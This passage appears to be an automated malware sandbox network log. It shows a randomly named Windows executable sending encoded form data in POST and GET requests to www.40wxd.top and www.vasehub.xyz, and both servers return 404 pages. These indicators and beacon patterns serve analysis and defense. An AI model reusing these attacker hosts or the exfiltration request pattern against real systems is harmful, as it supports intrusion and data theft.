                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            11192.168.2.849770206.119.82.134806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:41.521265984 CET1822OUTPOST /xqel/ HTTP/1.1
                                                                                                                                                            Host: www.40wxd.top
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.40wxd.top
                                                                                                                                                            Referer: http://www.40wxd.top/xqel/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 69 74 43 6a 45 30 78 7a 32 78 6b 49 53 47 45 58 6b 32 48 6f 39 6f 62 2f 4d 42 62 39 53 67 76 43 30 63 62 38 73 74 74 37 6f 4e 77 61 39 6f 34 41 45 70 41 67 6d 6d 2f 57 5a 67 42 7a 59 62 66 74 69 55 36 6f 46 57 78 56 68 38 70 32 45 53 6f 34 62 6b 57 51 5a 52 4d 78 5a 77 35 6e 43 7a 4e 55 30 50 41 2f 58 43 44 72 46 55 4f 77 2f 51 53 33 79 33 79 64 76 4a 4d 46 46 78 71 49 41 6e 32 64 54 37 6d 62 78 78 55 56 6f 55 43 30 39 4d 50 77 6d 54 77 6c 39 64 37 62 6d 45 70 4f 2b 36 75 48 75 33 48 34 52 31 6f 6e 4e 50 32 77 44 39 73 71 30 73 39 65 5a 44 5a 61 30 30 43 51 6a 45 2b 47 75 4e 5a 75 51 30 4e 65 73 30 48 4b 67 72 46 37 6f 68 65 44 6d 61 43 30 5a 6b 67 6d 6c 41 6a 53 6b 55 62 78 6c 61 76 5a 52 59 51 76 56 71 54 71 49 34 35 45 67 65 67 5a 4e 7a 66 6e 42 72 50 63 50 68 4f 56 47 31 63 67 53 76 39 63 39 4a 31 71 52 6f 44 5a 4b 58 72 69 51 67 51 34 67 64 6f 6c 4f 71 38 52 4c 34 42 4b 7a 74 4f 39 73 6b 76 73 38 4d 67 6b 58 77 63 72 74 39 45 48 6b 61 37 37 41 71 74 6d 51 51 77 54 72 59 4e [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=itCjE0xz2xkISGEXk2Ho9ob/MBb9SgvC0cb8stt7oNwa9o4AEpAgmm/WZgBzYbftiU6oFWxVh8p2ESo4bkWQZRMxZw5nCzNU0PA/XCDrFUOw/QS3y3ydvJMFFxqIAn2dT7mbxxUVoUC09MPwmTwl9d7bmEpO+6uHu3H4R1onNP2wD9sq0s9eZDZa00CQjE+GuNZuQ0Nes0HKgrF7oheDmaC0ZkgmlAjSkUbxlavZRYQvVqTqI45EgegZNzfnBrPcPhOVG1cgSv9c9J1qRoDZKXriQgQ4gdolOq8RL4BKztO9skvs8MgkXwcrt9EHka77AqtmQQwTrYNhewNsM7WZJzYbxLRGBZuvUsz9iQTio43lwObR9rrrORvgnIPbj6dfCJQMpySgK842CbYW1UPyaaz3DQ5p0hLVaHf5f2zDHg1EKcFo7rvUnuYAkr+YY3K8uvSRwcNr9/5z2BDJt77Pr0cghehht0eCfHmdVBD6adqWGmjE86+jnO8LtHiEGQfhpcgtL6qsjnhpUPmB73AsH2BF2MITXpdDKDjtOhQGC258pahCBYh4LgWQ2EdfyPj5p4utpdpHu8RQSxUylRJ1I3XNN8fFuECJx/KupqjZ7YA3+99KQoEkxJfj4vLOG6sXhfjT3n+NWP1FWbcOJQzUed4DRyUHRQ1AanXZAtf/T/R6fV3uO/ya3Q7qHOVTQhl6wEqnmGDLErCVt2g31SrViUF0sPWLR2CiWjwgISKcJl/BsvjqDe4lZKN2nm+GVn/oTVWzc5aeiNnYzcV0958XipfQ2aJ6pfW6rYNlENQksFgDngbOsmBguOF4sYOcq/phGft8fyLYfmyodGcGvuFzKw9QxCpZS36OanIS7IRAoDWwx4SUoBkeD2CUkB00WZk9SyMA2tqqAeTuwIslshKbletT/rNoM+G0vxQpOzm6j1QF1cySM/48fudobkdiK4rrztPJL9xet7nsFJHkayl1f4dI4B1tDwjq8T8+BwU/ZofUn [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:34:42.465552092 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:42 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            12192.168.2.849783206.119.82.134806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:44.060735941 CET534OUTGET /xqel/?TTd=yRNPZBU8fZA&mnYxMt=vvqDHEJ83RQMdUhg1EKNs//bEg71XT6q1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Ki9HalpMd1Ir/+EzHBu1DH6h7lGA7WG3xqwFFB+pHyvvKg== HTTP/1.1
                                                                                                                                                            Host: www.40wxd.top
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:34:45.337590933 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:44 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            13192.168.2.849806162.213.249.216806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:50.563554049 CET791OUTPOST /rhgo/ HTTP/1.1
                                                                                                                                                            Host: www.vasehub.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.vasehub.xyz
                                                                                                                                                            Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 55 71 62 48 6f 39 44 69 38 50 61 4b 2b 36 72 7a 56 67 33 54 71 6a 56 65 59 47 43 6e 46 52 50 61 4b 6c 56 42 7a 46 37 4a 64 7a 44 52 5a 46 67 51 51 6f 44 2f 63 54 71 52 67 4b 48 5a 64 46 58 6a 43 63 36 66 66 6f 31 51 35 42 75 6b 64 68 56 36 33 6c 44 7a 50 6a 52 74 47 58 6b 43 76 44 46 69 4b 38 72 56 69 64 64 6a 6c 57 64 31 31 4c 68 78 46 51 70 39 55 78 78 59 45 4c 48 42 6a 6b 37 4e 50 4c 39 44 63 6b 62 62 79 4f 4e 41 38 30 32 5a 43 79 38 6c 47 6c 6d 42 4e 59 31 49 35 62 61 43 64 2f 4a 55 74 35 72 66 70 68 61 36 6e 4f 55 41 41 55 6c 37 73 6f 61 50 38 69 49 3d
                                                                                                                                                            Data Ascii: mnYxMt=4zYQckirOMbOUqbHo9Di8PaK+6rzVg3TqjVeYGCnFRPaKlVBzF7JdzDRZFgQQoD/cTqRgKHZdFXjCc6ffo1Q5BukdhV63lDzPjRtGXkCvDFiK8rViddjlWd11LhxFQp9UxxYELHBjk7NPL9DckbbyONA802ZCy8lGlmBNY1I5baCd/JUt5rfpha6nOUAAUl7soaP8iI=
                                                                                                                                                            Nov 12, 2024 18:34:51.269753933 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:51 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 389
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            14192.168.2.849815162.213.249.216806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:53.195826054 CET811OUTPOST /rhgo/ HTTP/1.1
                                                                                                                                                            Host: www.vasehub.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.vasehub.xyz
                                                                                                                                                            Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 46 36 4c 48 70 61 76 69 35 76 61 4a 78 61 72 7a 62 41 33 58 71 6a 52 65 59 48 32 52 46 6e 58 61 4b 45 6c 42 30 45 37 4a 59 7a 44 52 52 6c 67 52 65 49 44 68 63 54 58 6b 67 4f 48 5a 64 46 72 6a 43 65 69 66 66 62 64 50 32 78 75 6d 53 42 56 38 71 31 44 7a 50 6a 52 74 47 55 5a 6e 76 44 64 69 4b 4e 62 56 6a 2f 35 67 37 47 64 36 79 4c 68 78 53 41 70 78 55 78 77 39 45 49 44 72 6a 6d 44 4e 50 4b 4e 44 4e 52 76 59 37 4f 4e 43 34 30 33 4c 48 77 64 35 65 46 69 67 4a 62 52 72 77 4a 4b 45 59 4a 6b 2b 33 62 6a 5a 71 68 79 52 6e 4e 38 32 46 6a 34 54 32 4c 4b 2f 69 31 63 6e 67 58 52 6f 36 6a 4b 4d 5a 44 59 31 56 30 5a 6d 62 61 72 71
                                                                                                                                                            Data Ascii: mnYxMt=4zYQckirOMbOF6LHpavi5vaJxarzbA3XqjReYH2RFnXaKElB0E7JYzDRRlgReIDhcTXkgOHZdFrjCeiffbdP2xumSBV8q1DzPjRtGUZnvDdiKNbVj/5g7Gd6yLhxSApxUxw9EIDrjmDNPKNDNRvY7ONC403LHwd5eFigJbRrwJKEYJk+3bjZqhyRnN82Fj4T2LK/i1cngXRo6jKMZDY1V0Zmbarq
                                                                                                                                                            Nov 12, 2024 18:34:53.882500887 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:53 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 389
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            15192.168.2.849822162.213.249.216806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:55.916640043 CET1828OUTPOST /rhgo/ HTTP/1.1
                                                                                                                                                            Host: www.vasehub.xyz
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.vasehub.xyz
                                                                                                                                                            Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 46 36 4c 48 70 61 76 69 35 76 61 4a 78 61 72 7a 62 41 33 58 71 6a 52 65 59 48 32 52 46 6e 76 61 4b 32 74 42 30 6e 6a 4a 62 7a 44 52 4f 56 67 55 65 49 43 6b 63 54 50 6f 67 4f 4c 76 64 41 76 6a 51 72 2b 66 5a 71 64 50 74 42 75 6d 51 42 56 35 33 6c 43 72 50 6a 41 6d 47 55 4a 6e 76 44 64 69 4b 4f 54 56 6b 74 64 67 35 47 64 31 31 4c 68 44 46 51 6f 6b 55 78 5a 41 45 4c 76 52 6a 56 4c 4e 4d 70 6c 44 65 48 44 59 6d 2b 4e 45 31 55 32 4f 48 77 52 51 65 46 75 61 4a 61 31 52 77 4c 61 45 5a 2f 5a 57 75 50 33 6d 75 69 79 7a 6f 39 52 63 46 42 55 78 38 5a 65 30 2f 33 34 5a 67 44 56 44 73 77 75 64 64 52 39 6c 49 77 5a 71 57 73 36 43 54 34 4d 71 69 6d 61 6e 39 59 79 5a 62 43 57 43 6a 49 38 69 65 6f 4c 72 34 6a 37 70 49 51 4b 41 4e 44 70 57 6a 53 33 67 78 51 4f 7a 37 53 37 35 70 47 45 6d 4e 55 35 32 7a 55 79 46 61 48 75 79 77 42 57 6f 32 68 7a 72 61 63 70 6c 37 6b 57 4b 76 2f 51 79 32 67 31 70 43 6f 77 58 74 49 62 52 77 2f 50 6b 36 37 70 73 37 44 58 52 66 71 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=4zYQckirOMbOF6LHpavi5vaJxarzbA3XqjReYH2RFnvaK2tB0njJbzDROVgUeICkcTPogOLvdAvjQr+fZqdPtBumQBV53lCrPjAmGUJnvDdiKOTVktdg5Gd11LhDFQokUxZAELvRjVLNMplDeHDYm+NE1U2OHwRQeFuaJa1RwLaEZ/ZWuP3muiyzo9RcFBUx8Ze0/34ZgDVDswuddR9lIwZqWs6CT4Mqiman9YyZbCWCjI8ieoLr4j7pIQKANDpWjS3gxQOz7S75pGEmNU52zUyFaHuywBWo2hzracpl7kWKv/Qy2g1pCowXtIbRw/Pk67ps7DXRfqp8mywI0apc1nOW9FhwvITYjlWxBW1a0R7IpwL0DIBO/xnTMNIUp7thdKXNC61JHiY9UxQf9lhP6nrfghKut8Po2vNSV6KSH+OGCu9viISMMZG5YWKP8pMHnbtITec4pcChxMQIeqQ/XDhtkJXapgFjSlJMEU5iR3qS0cm7KuohkJcTc54VJEjAq2/JKE3DuCLy9AzE03JxcBmQO2oPVPxpbdi7NDWZT94bEGuetOSalQjSZ3AaPu6NWGUgzcqCFnJPnfuVp6Nu1dJo1Bb8iGHHS3yOUNAuCwOMf/61NNvovxCPyBD0oxZSqhA1hXVMLHKGfR6CXtUEZ3TaHZwz9fKP4in/8+TZ+YuNf0xrcJhSzILH3QEwvigAQE3BHB2Y0MM4R2+MBvnG+QNQJ5szD+V+J1mBA22nnMX20vx11rNENzTp5pyRpiHtmIxm/8sqtsWHyBR+2gIoRI9jDzA4eZaQCPYL2wZPlSGHbeSHBmKajD8LzQ6/X1WctXJO7VAIkWZ1wlJgtUImEZ8OQUVSU/1UlQS+4QiBiEw3C5AQCKmf8hfefqYwjbLYwJvYNA5ECWuxHD4jb+yxyXHlyDanc5ueHKdWRH50Z4+LV3xujgD2dAy715w76GTRvuKIOfRh+ou5q39i4FBOEyi3DElRqueNPac9jnI8pqd4T [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:34:56.514447927 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:56 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 389
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
